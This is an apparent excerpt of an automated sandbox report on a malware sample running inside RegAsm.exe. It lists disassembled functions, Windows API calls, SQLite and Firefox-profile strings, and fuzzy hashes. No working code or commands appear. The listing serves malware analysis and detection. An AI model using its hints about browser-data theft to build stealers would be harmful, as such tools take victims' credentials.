ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6B9CF1
%s at line %d of [%.10s], xrefs: 1B6B9D00
misuse, xrefs: 1B6B9CFB
API called with finalized prepared statement, xrefs: 1B6B9CE5

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3620335220
Opcode ID: ade507dd2250ac42534cfb690feaa120a9035d82e5d447f72e580b8be3b816ff
Instruction ID: 033617891400c0ae7183b3d616cd05899c22d7eb6be897d10267e046ff4c476a
Opcode Fuzzy Hash: ade507dd2250ac42534cfb690feaa120a9035d82e5d447f72e580b8be3b816ff
Instruction Fuzzy Hash: 57113DE6F01A1566DE116B29BC45BCE7268AFE196BF010039F94596340E610B88593F2

Function 1B7331F0 Relevance: 9.5, APIs: 6, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ca2ddd6a58d634c0b9c1e508c56339805a780fbb1fe01a518e5dcdf439ec8de
Instruction ID: 7bea0675ae15a851f9a6affe9bd8fc438fb346f08990f97a234a21dd04770434
Opcode Fuzzy Hash: 9ca2ddd6a58d634c0b9c1e508c56339805a780fbb1fe01a518e5dcdf439ec8de
Instruction Fuzzy Hash: B7F1E671A043419FD721CF24D4C07EABBE0BF44226F46466DF8958B362D735E9858B92

Function 004170D4 Relevance: 9.1, APIs: 6, Instructions: 128registrystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004170D9
memset.MSVCRT ref: 00417105
RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,?,?,?,00000000), ref: 00417122
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 00417142
lstrcat.KERNEL32(?,?), ref: 00417171
lstrcat.KERNEL32(?), ref: 00417184

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prologOpenQueryValuememset
String ID:
API String ID: 2333602472-0
Opcode ID: d9373126e1dc138c3136be61258351eef7578349bc004157723a4198b47a7ae2
Instruction ID: 165c64955ada5dd690f82560ae2227265157eda90b096ca655810e6d6b2df996
Opcode Fuzzy Hash: d9373126e1dc138c3136be61258351eef7578349bc004157723a4198b47a7ae2
Instruction Fuzzy Hash: F1417DB184021DABDF00EFA1DC46EDE7B7DEB09304F00056AF604A2151E7359B998FE6

Function 1B7B73E0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 369COMMON

Download Yara Rule

Strings

ase, xrefs: 1B7B768D
sqlite_master, xrefs: 1B7B73FD
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 1B7B776D
sqlite_temp_master, xrefs: 1B7B73F2

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master
API String ID: 0-231581592
Opcode ID: b926b54970eebb296d070ff22510e70e1b0f1df4b4a7de8723fc93aa8542953c
Instruction ID: 66c30eb03fc79dd43c8185add7331d7977b48eb46bfd76847db15d7f15bafb06
Opcode Fuzzy Hash: b926b54970eebb296d070ff22510e70e1b0f1df4b4a7de8723fc93aa8542953c
Instruction Fuzzy Hash: 10E1F5B0A043429FD711CF24D981B9AFBE4BF95708F08452CF99597251E771E984CF92

Function 0041C147 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0041C155

Part of subcall function 0041AB33: __mtinitlocknum.LIBCMT ref: 0041AB49
Part of subcall function 0041AB33: __amsg_exit.LIBCMT ref: 0041AB55
Part of subcall function 0041AB33: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041B7A1,0000000D,?,?,0041BBF5,0041A692,?,?,0041979B,00000000,0042DED0,004197E2,?), ref: 0041AB5D

DecodePointer.KERNEL32(0042DE58,00000020,0041C298,00000000,00000001,00000000,?,0041C2BA,000000FF,?,0041AB5A,00000011,00000000,?,0041B7A1,0000000D), ref: 0041C191
DecodePointer.KERNEL32(?,0041C2BA,000000FF,?,0041AB5A,00000011,00000000,?,0041B7A1,0000000D,?,?,0041BBF5,0041A692), ref: 0041C1A2

Part of subcall function 0041B71A: EncodePointer.KERNEL32(00000000,0041F2EC,00641458,00000314,00000000,?,?,?,?,?,0041C4AF,00641458,Microsoft Visual C++ Runtime Library,00012010), ref: 0041B71C

DecodePointer.KERNEL32(-00000004,?,0041C2BA,000000FF,?,0041AB5A,00000011,00000000,?,0041B7A1,0000000D,?,?,0041BBF5,0041A692), ref: 0041C1C8
DecodePointer.KERNEL32(?,0041C2BA,000000FF,?,0041AB5A,00000011,00000000,?,0041B7A1,0000000D,?,?,0041BBF5,0041A692), ref: 0041C1DB
DecodePointer.KERNEL32(?,0041C2BA,000000FF,?,0041AB5A,00000011,00000000,?,0041B7A1,0000000D,?,?,0041BBF5,0041A692), ref: 0041C1E5

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: 9389fa439de07799668fa6fb7528059da46850322112382c7e99f1ad758988c3
Instruction ID: 203bb53f675d54a00f5d095d39f2d5c99d881e12e20759b04b54da32f8966848
Opcode Fuzzy Hash: 9389fa439de07799668fa6fb7528059da46850322112382c7e99f1ad758988c3
Instruction Fuzzy Hash: B8311470E802099FDF50AFE9DC856DDBAF1BB0A355F10806BE410A6291DBBC4995CF29

Function 0041AF20 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041AF2C

Part of subcall function 0041B884: __getptd_noexit.LIBCMT ref: 0041B887
Part of subcall function 0041B884: __amsg_exit.LIBCMT ref: 0041B894

__amsg_exit.LIBCMT ref: 0041AF4C
__lock.LIBCMT ref: 0041AF5C
InterlockedDecrement.KERNEL32(?), ref: 0041AF79
_free.LIBCMT ref: 0041AF8C
InterlockedIncrement.KERNEL32(0042F1C0), ref: 0041AFA4

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 1e827ee23bb3e70df1e41bae06209c6c91ac37d3c5e2f83c72171efd40aa22ae
Instruction ID: d100412c1c456c158b61082d17fa93871d043b47f49655a41b741997180fc20d
Opcode Fuzzy Hash: 1e827ee23bb3e70df1e41bae06209c6c91ac37d3c5e2f83c72171efd40aa22ae
Instruction Fuzzy Hash: 74013071A02621ABC621AF559805BDA7370AF00715F94802BF81467291C73C5DE7CADF

Function 1B6C0970 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 207COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6C0A91, 1B6C0B73
%s at line %d of [%.10s], xrefs: 1B6C0AA0, 1B6C0B82
database corruption, xrefs: 1B6C0A9B, 1B6C0B7D

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 1f0460a096904fc8b57d36d0f9cb74fb13e43c7e084e121356507854941f35ba
Instruction ID: 81400fb89c83055ce4de48d748b25f880db356b2186dfa7e8048055abd113b95
Opcode Fuzzy Hash: 1f0460a096904fc8b57d36d0f9cb74fb13e43c7e084e121356507854941f35ba
Instruction Fuzzy Hash: FF61F1B5B042018FCB04DF28D880A9BB7E5FB9D714F0605A9EC899B312E771E844CBA1

Function 1B78ABF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 204COMMON

Download Yara Rule

Strings

unable to delete/modify user-function due to active statements, xrefs: 1B78AD61
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B78AE0E
%s at line %d of [%.10s], xrefs: 1B78AE1D
misuse, xrefs: 1B78AE18

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
API String ID: 0-3864549341
Opcode ID: 2c94d6c5ccc810158f65a12e2a71f1f94adabd8831423de92ee5b59ff129eb55
Instruction ID: 2fe782e8abf77da662422775982e2276f9c83ad5146715f7d0360a1a26d89b37
Opcode Fuzzy Hash: 2c94d6c5ccc810158f65a12e2a71f1f94adabd8831423de92ee5b59ff129eb55
Instruction Fuzzy Hash: 9651E172604701AFD710AE24DC81BAFB7F9FF89715F04492DF686D6250E332E8419B62

Function 0040BE75 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 186stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040BE7A

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

Part of subcall function 00411B55: LocalAlloc.KERNEL32(00000040,?,000000C8,00000001,?,00413F3B,00000000,00000000), ref: 00411B6E

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00426F88,00426C9A), ref: 0040BF3B
lstrlenA.KERNEL32(00000000), ref: 0040BF57

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040BC44: _EH_prolog.MSVCRT ref: 0040BC49

Strings

^userContextId=4294967295, xrefs: 0040BFA2
moz-extension+++, xrefs: 0040BF7D

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 2813378046-3310892237
Opcode ID: 0fa5739aac8e61d1af54969c4d9e70286597886c95e1368eaa3db2e29bc7792c
Instruction ID: aa378f3f393c6f0bf4ef5264fdf5fbf40a59fe2ac5a126e2390ab41a3762eaae
Opcode Fuzzy Hash: 0fa5739aac8e61d1af54969c4d9e70286597886c95e1368eaa3db2e29bc7792c
Instruction Fuzzy Hash: 6B71C331805248EECF04EBE4D946BDDBBB4AF15308F40415EF855632C2DBB82788CAA6

Function 1B69A860 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

tables_used, xrefs: 1B69A973, 1B69A97B
bytecode, xrefs: 1B69A96E
argument to %s() is not a valid SQL statement, xrefs: 1B69A97C
stmt-pointer, xrefs: 1B69A928

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: argument to %s() is not a valid SQL statement$bytecode$stmt-pointer$tables_used
API String ID: 0-361449301
Opcode ID: c8738df7914373ac6baec6c617ca9d3f97b47c5e53eb539f423327bf2ba43e7c
Instruction ID: 737c838ad221ea7003cea3a9379ef75b558d1a21835126daeaac5c78ff595214
Opcode Fuzzy Hash: c8738df7914373ac6baec6c617ca9d3f97b47c5e53eb539f423327bf2ba43e7c
Instruction Fuzzy Hash: CB61DFF19103428FDB148F24E9857DA77E4FF50705F01092AE996CB281E776E94CCBA1

Function 1B682AF4 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,1B8C94C2,00000104), ref: 1B87EFDB

Strings

<program name unknown>, xrefs: 1B87EFEA
..., xrefs: 1B87F029
Runtime Error!Program: , xrefs: 1B87EFA7
Microsoft Visual C++ Runtime Library, xrefs: 1B87F070

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: dd6cf44fe3ed62d24e8d7507ea27045c83a4baf8a77ee9fd7107dc41d085bf50
Instruction ID: fda97db3c837452356c66eaecc5907688302969db2e4322fb013b55c2ff20381
Opcode Fuzzy Hash: dd6cf44fe3ed62d24e8d7507ea27045c83a4baf8a77ee9fd7107dc41d085bf50
Instruction Fuzzy Hash: C92122B6A4039776DB3172228C85EEB36DC9BA5E99B040465FC08E7380F721D619C1A5

Function 1B7ABF00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 156COMMON

Download Yara Rule

Strings

fts5: %s queries are not supported (detail!=full), xrefs: 1B7AC043
fts5 expression tree is too large (maximum depth %d), xrefs: 1B7AC070
NEAR, xrefs: 1B7AC03A
phrase, xrefs: 1B7AC035, 1B7AC042

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: NEAR$fts5 expression tree is too large (maximum depth %d)$fts5: %s queries are not supported (detail!=full)$phrase
API String ID: 0-593389478
Opcode ID: 2802906554ef52c9e1e8aabab8022f28f92a2761160d84c82084667ac2d49613
Instruction ID: e5226aa699c1671b37b0b2f0ee3e6d918c8c10877b68316e1a0add7bfc11a780
Opcode Fuzzy Hash: 2802906554ef52c9e1e8aabab8022f28f92a2761160d84c82084667ac2d49613
Instruction Fuzzy Hash: F941D175A00202AFDB548E34DD80BEFB3A4EF85225F1C4B6EF85597211E772E885CB91

Function 1B6CF490 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6CF4B0
unable to delete/modify collation sequence due to active statements, xrefs: 1B6CF533
%s at line %d of [%.10s], xrefs: 1B6CF4BF
misuse, xrefs: 1B6CF4BA

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
